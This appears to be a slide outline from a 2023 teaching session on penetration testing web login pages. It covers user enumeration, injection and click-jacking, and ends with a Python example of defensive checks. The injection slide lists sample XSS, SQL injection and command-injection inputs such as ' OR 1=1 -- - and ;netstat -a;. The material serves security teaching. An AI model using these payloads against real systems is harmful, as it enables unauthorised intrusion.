
Web App Pen Test

Mar. 18, 2023

  1. Session on Web Application Pen Test 18 Mar 2023, Bhubaneswar
  2. Who am I
     • Name: Lagnajeet Mishra
     • <You may call me Lagna/Bhai/Bhaiya/Bhaina but definitely not “uncle”>
     • Has been in the IT industry for 10 yrs (*not out)
     • Worked in MNCs like UST Global, Infosys, TCS
     • Achievement: surviving on this planet for the last 32* years and currently standing in front of you “alive”
     • My parents told me I was born at Puri and I never doubted them
     • Hobbies: Cooking, Cricket, Chess
  3. Now let's get to the point
  4. Web Application Penetration Testing
     Topic for today: Login functionality of a web application
  5. Test cases of the day
     • User Enumeration
     • Injection
     • Click-Jacking
  6. User Enumeration
     • When an actor can use brute-force techniques to either guess or confirm valid users in a system (for a login form: the application responds differently to a valid username than to an invalid one).
  7. What should the ideal response be?
  8. Injection
  9. What can be injected when we consider input fields in a web application?
     • Text
     • Alpha-numeric
     • Numeric
     • SQL
     • Script
     • HTML
     • Command
     Sample inputs used in the session:
        "`'><script>-javascript:alert(1)</script>
        ";alert('XSS');//
        ¼script¾alert(¢XSS¢)¼/script¾
        <iframe/src //onload = prompt(1)
        ' OR 1=1 -- -
        -1 UNION SELECT 1 INTO @,@,@
        <h1>Hello,<script>alert(1)</script>!</h1>
        ;netstat -a;
        & ping -i 30 127.0.0.1 &
  10. Practice exercises:
      • https://www.hacksplaining.com/exercises/sql-injection
      • https://www.hacksplaining.com/exercises/xss-reflected
      • https://www.hacksplaining.com/exercises/command-execution
  11. Click-Jacking
      • The malicious practice of manipulating a website user's activity by concealing hyperlinks beneath legitimate clickable content, thereby causing the user to perform actions of which they are unaware.
  12. Let's try something
      • https://www.hacksplaining.com/exercises/click-jacking#
  13. The End
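As an added example (not part of the slides), the user-enumeration and click-jacking test cases above expressed as defensive checks in Python: a login handler whose error text gives away whether a username exists sits beside one that gives the ideal uniform response, and a header check shows what a login page should send so it cannot be framed. The user store, hash scheme and function names are constructed for this demo.

```python
import hashlib
import hmac
import secrets

# Constructed user store for the demo: username -> (salt, sha256(salt + password)).
# A real login would use a password KDF (bcrypt/argon2); sha256 keeps the example dependency-free.
_SALT = b"constructed-salt"

def _hash(salt, password):
    return hashlib.sha256(salt + password.encode()).hexdigest()

USERS = {"alice": (_SALT, _hash(_SALT, "correct horse"))}
# Dummy credential hashed when the username is unknown, so unknown and known users cost the same.
_DUMMY = (_SALT, _hash(_SALT, secrets.token_hex(16)))
GENERIC_ERROR = "Invalid username or password."

def leaky_login(username, password):
    """The response a tester flags: the error text reveals whether the username exists."""
    if username not in USERS:
        return 401, "User not found"
    salt, expected = USERS[username]
    if hmac.compare_digest(_hash(salt, password), expected):
        return 200, "Welcome"
    return 401, "Wrong password"

def login(username, password):
    """Ideal response: identical status and body for an unknown user and a wrong password."""
    salt, expected = USERS.get(username, _DUMMY)
    if username in USERS and hmac.compare_digest(_hash(salt, password), expected):
        return 200, "Welcome"
    return 401, GENERIC_ERROR

def enumeration_check(login_fn, unknown_user, known_user, bad_password):
    """True when the login function gives away nothing about which usernames exist."""
    return login_fn(unknown_user, bad_password) == login_fn(known_user, bad_password)

def security_headers():
    """Headers the login page should send so it cannot be framed (click-jacking defence)."""
    return {"X-Frame-Options": "DENY",
            "Content-Security-Policy": "frame-ancestors 'none'"}

def clickjacking_check(headers):
    """True when a response carries a framing restriction a tester would accept."""
    xfo = headers.get("X-Frame-Options", "").strip().upper()
    csp = headers.get("Content-Security-Policy", "")
    return xfo in ("DENY", "SAMEORIGIN") or "frame-ancestors" in csp
```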